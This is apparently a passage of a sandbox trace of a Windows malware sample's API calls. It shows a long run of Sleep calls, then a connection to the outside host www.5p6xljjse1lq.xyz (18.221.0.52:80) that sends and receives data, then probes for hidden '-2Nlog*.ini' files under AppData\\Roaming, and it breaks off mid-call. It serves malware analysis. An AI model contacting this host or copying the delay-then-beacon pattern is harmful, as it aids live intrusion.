[0284.652] Sleep (dwMilliseconds=0x7d0) [0284.654] Sleep (dwMilliseconds=0x7d0) [0284.655] Sleep (dwMilliseconds=0x7d0) [0284.657] Sleep (dwMilliseconds=0x7d0) [0284.658] Sleep (dwMilliseconds=0x7d0) [0284.660] Sleep (dwMilliseconds=0x7d0) [0284.661] Sleep (dwMilliseconds=0x7d0) [0284.663] Sleep (dwMilliseconds=0x7d0) [0284.664] Sleep (dwMilliseconds=0x7d0) [0284.666] Sleep (dwMilliseconds=0x7d0) [0284.667] Sleep (dwMilliseconds=0x7d0) [0284.669] Sleep (dwMilliseconds=0x7d0) [0284.670] Sleep (dwMilliseconds=0x7d0) [0284.672] Sleep (dwMilliseconds=0x7d0) [0284.673] Sleep (dwMilliseconds=0x7d0) [0284.675] Sleep (dwMilliseconds=0x7d0) [0284.676] Sleep (dwMilliseconds=0x7d0) [0284.678] Sleep (dwMilliseconds=0x7d0) [0284.679] Sleep (dwMilliseconds=0x7d0) [0284.681] Sleep (dwMilliseconds=0x7d0) [0284.682] Sleep (dwMilliseconds=0x7d0) [0284.684] Sleep (dwMilliseconds=0x7d0) [0284.685] Sleep (dwMilliseconds=0x7d0) [0284.687] Sleep (dwMilliseconds=0x7d0) [0284.688] Sleep (dwMilliseconds=0x7d0) [0284.690] Sleep (dwMilliseconds=0x7d0) [0284.691] Sleep (dwMilliseconds=0x7d0) [0284.693] Sleep (dwMilliseconds=0x7d0) [0284.694] Sleep (dwMilliseconds=0x7d0) [0284.697] Sleep (dwMilliseconds=0x7d0) [0284.698] Sleep (dwMilliseconds=0x7d0) [0284.700] Sleep (dwMilliseconds=0x7d0) [0284.701] Sleep (dwMilliseconds=0x7d0) [0284.703] Sleep (dwMilliseconds=0x7d0) [0284.704] Sleep (dwMilliseconds=0x7d0) [0284.706] Sleep (dwMilliseconds=0x7d0) [0284.707] Sleep (dwMilliseconds=0x7d0) [0284.709] Sleep (dwMilliseconds=0x7d0) [0284.710] Sleep (dwMilliseconds=0x7d0) [0284.712] Sleep (dwMilliseconds=0x7d0) [0284.713] Sleep (dwMilliseconds=0x7d0) [0284.715] Sleep (dwMilliseconds=0x7d0) [0284.716] Sleep (dwMilliseconds=0x7d0) [0284.718] Sleep (dwMilliseconds=0x7d0) [0284.719] Sleep (dwMilliseconds=0x7d0) [0284.721] Sleep (dwMilliseconds=0x7d0) [0284.722] Sleep (dwMilliseconds=0x7d0) [0284.724] Sleep (dwMilliseconds=0x7d0) [0284.725] Sleep (dwMilliseconds=0x7d0) [0284.727] Sleep (dwMilliseconds=0x7d0) [0284.728] Sleep (dwMilliseconds=0x7d0) [0284.730] Sleep (dwMilliseconds=0x7d0) [0284.731] Sleep (dwMilliseconds=0x7d0) [0284.733] Sleep (dwMilliseconds=0x7d0) [0284.734] Sleep (dwMilliseconds=0x7d0) [0284.736] Sleep (dwMilliseconds=0x7d0) [0284.737] Sleep (dwMilliseconds=0x7d0) [0284.739] Sleep (dwMilliseconds=0x7d0) [0284.740] Sleep (dwMilliseconds=0x7d0) [0284.742] Sleep (dwMilliseconds=0x7d0) [0284.743] Sleep (dwMilliseconds=0x7d0) [0284.745] Sleep (dwMilliseconds=0x7d0) [0284.746] Sleep (dwMilliseconds=0x7d0) [0284.748] Sleep (dwMilliseconds=0x7d0) [0284.749] Sleep (dwMilliseconds=0x7d0) [0284.751] Sleep (dwMilliseconds=0x7d0) [0284.752] Sleep (dwMilliseconds=0x7d0) [0284.754] Sleep (dwMilliseconds=0x7d0) [0284.755] Sleep (dwMilliseconds=0x7d0) [0284.757] Sleep (dwMilliseconds=0x7d0) [0284.758] Sleep (dwMilliseconds=0x7d0) [0284.760] Sleep (dwMilliseconds=0x7d0) [0284.761] Sleep (dwMilliseconds=0x7d0) [0284.763] Sleep (dwMilliseconds=0x7d0) [0284.764] Sleep (dwMilliseconds=0x7d0) [0284.766] Sleep (dwMilliseconds=0x7d0) [0284.767] Sleep (dwMilliseconds=0x7d0) [0284.769] Sleep (dwMilliseconds=0x7d0) [0284.770] Sleep (dwMilliseconds=0x7d0) [0284.772] Sleep (dwMilliseconds=0x7d0) [0284.773] Sleep (dwMilliseconds=0x7d0) [0284.775] Sleep (dwMilliseconds=0x7d0) [0284.776] Sleep (dwMilliseconds=0x7d0) [0284.778] Sleep (dwMilliseconds=0x7d0) [0284.779] Sleep (dwMilliseconds=0x7d0) [0284.781] Sleep (dwMilliseconds=0x7d0) [0284.782] Sleep (dwMilliseconds=0x7d0) [0284.784] Sleep (dwMilliseconds=0x7d0) [0284.785] Sleep (dwMilliseconds=0x7d0) [0284.810] Sleep (dwMilliseconds=0x7d0) [0284.812] Sleep (dwMilliseconds=0x7d0) [0284.813] Sleep (dwMilliseconds=0x7d0) [0284.815] Sleep (dwMilliseconds=0x7d0) [0284.816] Sleep (dwMilliseconds=0x7d0) [0284.818] Sleep (dwMilliseconds=0x7d0) [0284.819] Sleep (dwMilliseconds=0x7d0) [0284.821] Sleep (dwMilliseconds=0x7d0) [0284.822] Sleep (dwMilliseconds=0x7d0) [0284.824] Sleep (dwMilliseconds=0x7d0) [0284.825] Sleep (dwMilliseconds=0x7d0) [0284.827] Sleep (dwMilliseconds=0x7d0) [0284.828] Sleep (dwMilliseconds=0x7d0) [0284.830] Sleep (dwMilliseconds=0x7d0) [0284.831] Sleep (dwMilliseconds=0x7d0) [0284.833] Sleep (dwMilliseconds=0x7d0) [0284.834] Sleep (dwMilliseconds=0x7d0) [0284.836] Sleep (dwMilliseconds=0x7d0) [0284.837] Sleep (dwMilliseconds=0x7d0) [0284.839] Sleep (dwMilliseconds=0x7d0) [0284.840] Sleep (dwMilliseconds=0x7d0) [0284.842] Sleep (dwMilliseconds=0x7d0) [0284.843] Sleep (dwMilliseconds=0x7d0) [0284.845] Sleep (dwMilliseconds=0x7d0) [0284.846] Sleep (dwMilliseconds=0x7d0) [0284.848] Sleep (dwMilliseconds=0x7d0) [0284.849] Sleep (dwMilliseconds=0x7d0) [0284.851] Sleep (dwMilliseconds=0x7d0) [0284.852] Sleep (dwMilliseconds=0x7d0) [0284.854] Sleep (dwMilliseconds=0x7d0) [0284.855] Sleep (dwMilliseconds=0x7d0) [0284.857] Sleep (dwMilliseconds=0x7d0) [0284.858] Sleep (dwMilliseconds=0x7d0) [0284.860] Sleep (dwMilliseconds=0x7d0) [0284.861] Sleep (dwMilliseconds=0x7d0) [0284.863] Sleep (dwMilliseconds=0x7d0) [0284.864] Sleep (dwMilliseconds=0x7d0) [0284.866] Sleep (dwMilliseconds=0x7d0) [0284.867] Sleep (dwMilliseconds=0x7d0) [0284.869] Sleep (dwMilliseconds=0x7d0) [0284.870] Sleep (dwMilliseconds=0x7d0) [0284.873] Sleep (dwMilliseconds=0x7d0) [0284.874] Sleep (dwMilliseconds=0x7d0) [0284.876] Sleep (dwMilliseconds=0x7d0) [0284.877] Sleep (dwMilliseconds=0x7d0) [0284.878] Sleep (dwMilliseconds=0x7d0) [0284.880] Sleep (dwMilliseconds=0x7d0) [0284.881] Sleep (dwMilliseconds=0x7d0) [0284.883] Sleep (dwMilliseconds=0x7d0) [0284.885] Sleep (dwMilliseconds=0x7d0) [0284.886] Sleep (dwMilliseconds=0x7d0) [0284.888] Sleep (dwMilliseconds=0x7d0) [0284.889] Sleep (dwMilliseconds=0x7d0) [0284.891] Sleep (dwMilliseconds=0x7d0) [0284.892] Sleep (dwMilliseconds=0x7d0) [0284.894] Sleep (dwMilliseconds=0x7d0) [0284.895] Sleep (dwMilliseconds=0x7d0) [0284.897] Sleep (dwMilliseconds=0x7d0) [0284.898] Sleep (dwMilliseconds=0x7d0) [0284.900] Sleep (dwMilliseconds=0x7d0) [0284.901] Sleep (dwMilliseconds=0x7d0) [0284.903] Sleep (dwMilliseconds=0x7d0) [0284.904] Sleep (dwMilliseconds=0x7d0) [0284.906] Sleep (dwMilliseconds=0x7d0) [0284.907] Sleep (dwMilliseconds=0x7d0) [0284.910] Sleep (dwMilliseconds=0x7d0) [0284.911] Sleep (dwMilliseconds=0x7d0) [0284.913] Sleep (dwMilliseconds=0x7d0) [0284.915] Sleep (dwMilliseconds=0x7d0) [0284.917] Sleep (dwMilliseconds=0x7d0) [0284.918] Sleep (dwMilliseconds=0x7d0) [0284.920] Sleep (dwMilliseconds=0x7d0) [0284.921] Sleep (dwMilliseconds=0x7d0) [0284.923] Sleep (dwMilliseconds=0x7d0) [0284.924] Sleep (dwMilliseconds=0x7d0) [0284.926] Sleep (dwMilliseconds=0x7d0) [0284.927] Sleep (dwMilliseconds=0x7d0) [0284.929] Sleep (dwMilliseconds=0x7d0) [0284.930] Sleep (dwMilliseconds=0x7d0) [0284.932] Sleep (dwMilliseconds=0x7d0) [0284.933] Sleep (dwMilliseconds=0x7d0) [0284.935] Sleep (dwMilliseconds=0x7d0) [0284.936] Sleep (dwMilliseconds=0x7d0) [0284.938] Sleep (dwMilliseconds=0x7d0) [0284.939] Sleep (dwMilliseconds=0x7d0) [0284.941] Sleep (dwMilliseconds=0x7d0) [0284.942] Sleep (dwMilliseconds=0x7d0) [0284.944] Sleep (dwMilliseconds=0x7d0) [0284.945] Sleep (dwMilliseconds=0x7d0) [0284.947] Sleep (dwMilliseconds=0x7d0) [0284.948] Sleep (dwMilliseconds=0x7d0) [0284.950] Sleep (dwMilliseconds=0x7d0) [0284.951] Sleep (dwMilliseconds=0x7d0) [0284.953] Sleep (dwMilliseconds=0x7d0) [0284.954] Sleep (dwMilliseconds=0x7d0) [0284.956] Sleep (dwMilliseconds=0x7d0) [0284.957] Sleep (dwMilliseconds=0x7d0) [0284.959] Sleep (dwMilliseconds=0x7d0) [0284.960] Sleep (dwMilliseconds=0x7d0) [0284.962] Sleep (dwMilliseconds=0x7d0) [0284.963] Sleep (dwMilliseconds=0x7d0) [0284.965] Sleep (dwMilliseconds=0x7d0) [0284.966] Sleep (dwMilliseconds=0x7d0) [0284.968] Sleep (dwMilliseconds=0x7d0) [0284.969] Sleep (dwMilliseconds=0x7d0) [0284.971] Sleep (dwMilliseconds=0x7d0) [0284.972] Sleep (dwMilliseconds=0x7d0) [0284.974] Sleep (dwMilliseconds=0x7d0) [0284.975] Sleep (dwMilliseconds=0x7d0) [0284.977] Sleep (dwMilliseconds=0x7d0) [0284.978] Sleep (dwMilliseconds=0x7d0) [0284.980] Sleep (dwMilliseconds=0x7d0) [0284.981] Sleep (dwMilliseconds=0x7d0) [0284.983] Sleep (dwMilliseconds=0x7d0) [0284.984] Sleep (dwMilliseconds=0x7d0) [0284.986] Sleep (dwMilliseconds=0x7d0) [0284.987] Sleep (dwMilliseconds=0x7d0) [0284.989] Sleep (dwMilliseconds=0x7d0) [0284.990] Sleep (dwMilliseconds=0x7d0) [0284.992] Sleep (dwMilliseconds=0x7d0) [0284.993] Sleep (dwMilliseconds=0x7d0) [0284.995] Sleep (dwMilliseconds=0x7d0) [0284.996] Sleep (dwMilliseconds=0x7d0) [0284.998] Sleep (dwMilliseconds=0x7d0) [0284.999] Sleep (dwMilliseconds=0x7d0) [0285.001] Sleep (dwMilliseconds=0x7d0) [0285.002] Sleep (dwMilliseconds=0x7d0) [0285.004] Sleep (dwMilliseconds=0x7d0) [0285.005] Sleep (dwMilliseconds=0x7d0) [0285.007] Sleep (dwMilliseconds=0x7d0) [0285.008] Sleep (dwMilliseconds=0x7d0) [0285.011] Sleep (dwMilliseconds=0x7d0) [0285.012] Sleep (dwMilliseconds=0x7d0) [0285.014] Sleep (dwMilliseconds=0x7d0) [0285.015] Sleep (dwMilliseconds=0x7d0) [0285.017] Sleep (dwMilliseconds=0x7d0) [0285.018] Sleep (dwMilliseconds=0x7d0) [0285.020] Sleep (dwMilliseconds=0x7d0) [0285.021] Sleep (dwMilliseconds=0x7d0) [0285.023] Sleep (dwMilliseconds=0x7d0) [0285.024] Sleep (dwMilliseconds=0x7d0) [0285.027] Sleep (dwMilliseconds=0x7d0) [0285.029] Sleep (dwMilliseconds=0x7d0) [0285.030] Sleep (dwMilliseconds=0x7d0) [0285.032] Sleep (dwMilliseconds=0x7d0) [0285.033] Sleep (dwMilliseconds=0x7d0) [0285.035] Sleep (dwMilliseconds=0x7d0) [0285.036] Sleep (dwMilliseconds=0x7d0) [0285.038] Sleep (dwMilliseconds=0x7d0) [0285.039] Sleep (dwMilliseconds=0x7d0) [0285.041] Sleep (dwMilliseconds=0x7d0) [0285.042] Sleep (dwMilliseconds=0x7d0) [0285.044] Sleep (dwMilliseconds=0x7d0) [0285.056] Sleep (dwMilliseconds=0x7d0) [0285.057] Sleep (dwMilliseconds=0x7d0) [0285.059] Sleep (dwMilliseconds=0x7d0) [0285.060] Sleep (dwMilliseconds=0x7d0) [0285.062] Sleep (dwMilliseconds=0x7d0) [0285.063] Sleep (dwMilliseconds=0x7d0) [0285.065] Sleep (dwMilliseconds=0x7d0) [0285.066] Sleep (dwMilliseconds=0x7d0) [0285.068] Sleep (dwMilliseconds=0x7d0) [0285.069] Sleep (dwMilliseconds=0x7d0) [0285.071] Sleep (dwMilliseconds=0x7d0) [0285.072] Sleep (dwMilliseconds=0x7d0) [0285.074] Sleep (dwMilliseconds=0x7d0) [0285.075] Sleep (dwMilliseconds=0x7d0) [0285.077] Sleep (dwMilliseconds=0x7d0) [0285.078] Sleep (dwMilliseconds=0x7d0) [0285.080] Sleep (dwMilliseconds=0x7d0) [0285.081] Sleep (dwMilliseconds=0x7d0) [0285.083] Sleep (dwMilliseconds=0x7d0) [0285.084] Sleep (dwMilliseconds=0x7d0) [0285.086] Sleep (dwMilliseconds=0x7d0) [0285.087] Sleep (dwMilliseconds=0x7d0) [0285.089] Sleep (dwMilliseconds=0x7d0) [0285.090] Sleep (dwMilliseconds=0x7d0) [0285.092] Sleep (dwMilliseconds=0x7d0) [0285.093] Sleep (dwMilliseconds=0x7d0) [0285.095] Sleep (dwMilliseconds=0x7d0) [0285.096] Sleep (dwMilliseconds=0x7d0) [0285.098] Sleep (dwMilliseconds=0x7d0) [0285.099] Sleep (dwMilliseconds=0x7d0) [0285.101] Sleep (dwMilliseconds=0x7d0) [0285.102] Sleep (dwMilliseconds=0x7d0) [0285.104] Sleep (dwMilliseconds=0x7d0) [0285.105] Sleep (dwMilliseconds=0x7d0) [0285.107] Sleep (dwMilliseconds=0x7d0) [0285.108] Sleep (dwMilliseconds=0x7d0) [0285.111] Sleep (dwMilliseconds=0x7d0) [0285.113] Sleep (dwMilliseconds=0x7d0) [0285.114] Sleep (dwMilliseconds=0x7d0) [0285.116] Sleep (dwMilliseconds=0x7d0) [0285.117] Sleep (dwMilliseconds=0x7d0) [0285.119] Sleep (dwMilliseconds=0x7d0) [0285.120] Sleep (dwMilliseconds=0x7d0) [0285.122] Sleep (dwMilliseconds=0x7d0) [0285.123] Sleep (dwMilliseconds=0x7d0) [0285.125] Sleep (dwMilliseconds=0x7d0) [0285.126] Sleep (dwMilliseconds=0x7d0) [0285.128] Sleep (dwMilliseconds=0x7d0) [0285.129] Sleep (dwMilliseconds=0x7d0) [0285.131] Sleep (dwMilliseconds=0x7d0) [0285.132] Sleep (dwMilliseconds=0x7d0) [0285.134] Sleep (dwMilliseconds=0x7d0) [0285.135] Sleep (dwMilliseconds=0x7d0) [0285.137] Sleep (dwMilliseconds=0x7d0) [0285.138] Sleep (dwMilliseconds=0x7d0) [0285.140] Sleep (dwMilliseconds=0x7d0) [0285.141] Sleep (dwMilliseconds=0x7d0) [0285.143] Sleep (dwMilliseconds=0x7d0) [0285.144] Sleep (dwMilliseconds=0x7d0) [0285.146] Sleep (dwMilliseconds=0x7d0) [0285.147] Sleep (dwMilliseconds=0x7d0) [0285.149] Sleep (dwMilliseconds=0x7d0) [0285.150] Sleep (dwMilliseconds=0x7d0) [0285.152] Sleep (dwMilliseconds=0x7d0) [0285.153] Sleep (dwMilliseconds=0x7d0) [0285.155] Sleep (dwMilliseconds=0x7d0) [0285.156] Sleep (dwMilliseconds=0x7d0) [0285.158] Sleep (dwMilliseconds=0x7d0) [0285.159] Sleep (dwMilliseconds=0x7d0) [0285.161] Sleep (dwMilliseconds=0x7d0) [0285.162] Sleep (dwMilliseconds=0x7d0) [0285.164] Sleep (dwMilliseconds=0x7d0) [0285.165] Sleep (dwMilliseconds=0x7d0) [0285.167] Sleep (dwMilliseconds=0x7d0) [0285.168] Sleep (dwMilliseconds=0x7d0) [0285.170] Sleep (dwMilliseconds=0x7d0) [0285.171] Sleep (dwMilliseconds=0x7d0) [0285.173] Sleep (dwMilliseconds=0x7d0) [0285.174] Sleep (dwMilliseconds=0x7d0) [0285.176] Sleep (dwMilliseconds=0x7d0) [0285.177] Sleep (dwMilliseconds=0x7d0) [0285.179] Sleep (dwMilliseconds=0x7d0) [0285.180] Sleep (dwMilliseconds=0x7d0) [0285.182] Sleep (dwMilliseconds=0x7d0) [0285.183] Sleep (dwMilliseconds=0x7d0) [0285.185] Sleep (dwMilliseconds=0x7d0) [0285.186] Sleep (dwMilliseconds=0x7d0) [0285.188] Sleep (dwMilliseconds=0x7d0) [0285.189] Sleep (dwMilliseconds=0x7d0) [0285.191] Sleep (dwMilliseconds=0x7d0) [0285.192] Sleep (dwMilliseconds=0x7d0) [0285.194] Sleep (dwMilliseconds=0x7d0) [0285.195] Sleep (dwMilliseconds=0x7d0) [0285.197] Sleep (dwMilliseconds=0x7d0) [0285.198] Sleep (dwMilliseconds=0x7d0) [0285.200] Sleep (dwMilliseconds=0x7d0) [0285.201] Sleep (dwMilliseconds=0x7d0) [0285.203] Sleep (dwMilliseconds=0x7d0) [0285.204] Sleep (dwMilliseconds=0x7d0) [0285.206] Sleep (dwMilliseconds=0x7d0) [0285.207] Sleep (dwMilliseconds=0x7d0) [0285.209] Sleep (dwMilliseconds=0x7d0) [0285.211] Sleep (dwMilliseconds=0x7d0) [0285.213] Sleep (dwMilliseconds=0x7d0) [0285.214] Sleep (dwMilliseconds=0x7d0) [0285.216] Sleep (dwMilliseconds=0x7d0) [0285.217] Sleep (dwMilliseconds=0x7d0) [0285.219] Sleep (dwMilliseconds=0x7d0) [0285.220] Sleep (dwMilliseconds=0x7d0) [0285.222] Sleep (dwMilliseconds=0x7d0) [0285.223] Sleep (dwMilliseconds=0x7d0) [0285.225] Sleep (dwMilliseconds=0x7d0) [0285.226] Sleep (dwMilliseconds=0x7d0) [0285.228] Sleep (dwMilliseconds=0x7d0) [0285.229] Sleep (dwMilliseconds=0x7d0) [0285.231] Sleep (dwMilliseconds=0x7d0) [0285.232] Sleep (dwMilliseconds=0x7d0) [0285.234] Sleep (dwMilliseconds=0x7d0) [0285.235] Sleep (dwMilliseconds=0x7d0) [0285.237] Sleep (dwMilliseconds=0x7d0) [0285.238] Sleep (dwMilliseconds=0x7d0) [0285.240] Sleep (dwMilliseconds=0x7d0) [0285.241] Sleep (dwMilliseconds=0x7d0) [0285.243] Sleep (dwMilliseconds=0x7d0) [0285.244] Sleep (dwMilliseconds=0x7d0) [0285.246] Sleep (dwMilliseconds=0x7d0) [0285.247] Sleep (dwMilliseconds=0x7d0) [0285.249] Sleep (dwMilliseconds=0x7d0) [0285.250] Sleep (dwMilliseconds=0x7d0) [0285.252] Sleep (dwMilliseconds=0x7d0) [0285.253] Sleep (dwMilliseconds=0x7d0) [0285.255] Sleep (dwMilliseconds=0x7d0) [0285.256] Sleep (dwMilliseconds=0x7d0) [0285.258] Sleep (dwMilliseconds=0x7d0) [0285.259] Sleep (dwMilliseconds=0x7d0) [0285.261] Sleep (dwMilliseconds=0x7d0) [0285.262] socket (af=2, type=1, protocol=6) returned 0x1b78 [0285.263] getaddrinfo (in: pNodeName="www.5p6xljjse1lq.xyz", pServiceName="80", pHints=0x8790d18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8790d48 | out: ppResult=0x8790d48*=0x862bac0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884380*(sa_family=2, sin_port=0x50, sin_addr="18.221.0.52"), ai_next=0x0)) returned 0 [0285.265] connect (s=0x1b78, name=0x8884380*(sa_family=2, sin_port=0x50, sin_addr="18.221.0.52"), namelen=16) returned 0 [0285.381] send (s=0x1b78, buf=0xa10808a*, len=174, flags=0) returned 174 [0285.381] setsockopt (s=0x1b78, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0285.381] recv (in: s=0x1b78, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 363 [0285.556] closesocket (s=0x1b78) returned 0 [0285.557] Sleep (dwMilliseconds=0x7d0) [0285.558] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.558] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0285.558] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0285.559] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0285.559] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.559] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0285.559] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0285.559] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0285.559] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0285.559] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0285.559] NtClose (Handle=0x1b78) returned 0x0 [0285.559] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.559] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0285.559] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0285.559] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b970) returned 1 [0285.559] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.559] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0285.560] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0285.560] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0285.560] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.560] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0285.560] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0285.560] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0285.560] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.560] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, 